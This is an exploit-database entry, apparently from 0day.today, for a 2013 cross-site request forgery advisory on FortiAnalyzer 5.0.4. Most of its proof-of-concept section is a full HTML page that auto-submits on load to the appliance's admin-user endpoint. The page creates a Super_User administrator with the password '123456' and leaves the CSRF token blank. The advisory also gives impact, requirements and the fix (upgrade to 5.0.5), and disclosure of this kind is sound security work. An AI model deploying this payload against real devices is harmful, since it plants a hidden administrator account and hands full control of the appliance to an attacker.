FortiAnalyzer 5.0.4 - CSRF Vulnerability

2013-11-13T00:00:00
ID 1337DAY-ID-21509
Type zdt
Reporter William Costa
Modified 2013-11-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Cert(R) no respond my email, not Fortinet has not given the credits.
 
 
 
 
I. VULNERABILITY
 
-------------------------
 
CSRF vulnerabilities in OS of fortianalyzer 5.0.4
 
 
 
II. BACKGROUND
 
-------------------------
 
Fortinet’s industry-leading, Network Security Platforms deliver Next
Generation Firewall (NGFW) security with exceptional throughput, ultra
low latency, and multi-vector threat protection.
 
 
 
III. DESCRIPTION
 
-------------------------
 
Has been detected a CSRF  vulnerability in FortiAnalyzer in
/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog" 5.0.4 , that
allows the execution attackers to hijack the authentication of
administrators for requests that modify settings or creation of user
administrator in fortianalyzer, because this functions are not
protected by CSRF-Tokens.
 
 
 
IV. PROOF OF CONCEPT
 
-------------------------
 
The application does not validate the parameter “csrf_token”
/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog.
 
 
 
<html>
 
 
 
<body onload="CSRF.submit();">
 
 
 
<html>
 
 
 
<body onload="CSRF.submit();">
 
 
 
<form id="csrf"
action="https://IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog"
method="post" name="CSRF">
 
<input name="userId" value="user.via.cfsr"> </input>
 
<input name="type" value="0"> </input>
 
<input name="rserver" value=""> </input>
 
<input name="lserver" value=""> </input>
 
<input name="subject" value=""> </input>
 
<input name="cacerts" value="Fortinet_CA2"> </input>
 
<input name="password" value="123456"> </input>
 
<input name="password_updated" value="1"> </input>
 
<input name="confirm_pwd" value="123456"> </input>
 
<input name="confirm_pwd_updated" value="1"> </input>
 
<input name="host_1" value="0.0.0.0/0.0.0.0"> </input>
 
<input name="host_2" value="255.255.255.255/255.255.255.255"> </input>
 
<input name="host_3" value="255.255.255.255/255.255.255.255"> </input>
 
<input name="host_4" value="255.255.255.255/255.255.255.255"> </input>
 
<input name="host_5" value="255.255.255.255/255.255.255.255"> </input>
 
<input name="host_6" value="255.255.255.255/255.255.255.255"> </input>
 
<input name="host_7" value="255.255.255.255/255.255.255.255"> </input>
 
<input name="host_8" value="255.255.255.255/255.255.255.255"> </input>
 
<input name="host_9" value="255.255.255.255/255.255.255.255"> </input>
 
<input name="host_10" value="255.255.255.255/255.255.255.255"> </input>
 
<input name="host6_1"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="host6_2"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="host6_3"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="host6_4"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="host6_5"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="host6_6"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="host6_7"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="host6_8"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="host6_9"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="host6_10"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
 
<input name="profile" value="Super_User"> </input>
 
<input name="alladomRDGrp" value="0"> </input>
 
<input name="_adom" value=""> </input>
 
<input name="allpackRDGrp" value="0"> </input>
 
<input name="_adom" value=""> </input>
 
<input name="allpackRDGrp" value="0"> </input>
 
<input name="_pack" value=""> </input>
 
<input name="desc" value=""> </input>
 
<input name="showForce" value="0"> </input>
 
<input name="numhosts" value="0"> </input>
 
<input name="numhosts6" value="3"> </input>
 
<input name="_comp_8" value="OK"> </input>
 
<input name="actionevent" value="new"> </input>
 
<input name="profileId" value=""> </input>
 
<input name="mgt" value=""> </input>
 
<input name="dashboard" value=""> </input>
 
<input name="dashboardmodal" value=""> </input>
 
<input name="csrf_token" value=""> </input>
 
 
 
 
 
</form>
 
</body>
 
 
 
</html>
 
 
 
V. BUSINESS IMPACT
 
-------------------------
 
 
 
That allows the execution attackers to hijack the authentication of
administrators for requests that modify settings or creation of user
administrator in fortianalyzer and have access all function of box.
 
 
 
VI. REQUIREMENTS
 
-----------------------
 
An Attacker needs to know the IP of the device.
 
An Administrator needs an authenticated connection to the device.
 
 
 
VII. SYSTEMS AFFECTED
 
-------------------------
 
Try Fortianalyzer VM or appliance v5.0.4
 
 
 
 
 
 
 
VIII. SOLUTION
 
-------------------------
 
UpGrade for v5.0.5
 
 
 
POC
 
https://vimeo.com/78776768
 
By William Costa
 
[email protected]

#  0day.today [2018-01-04]  #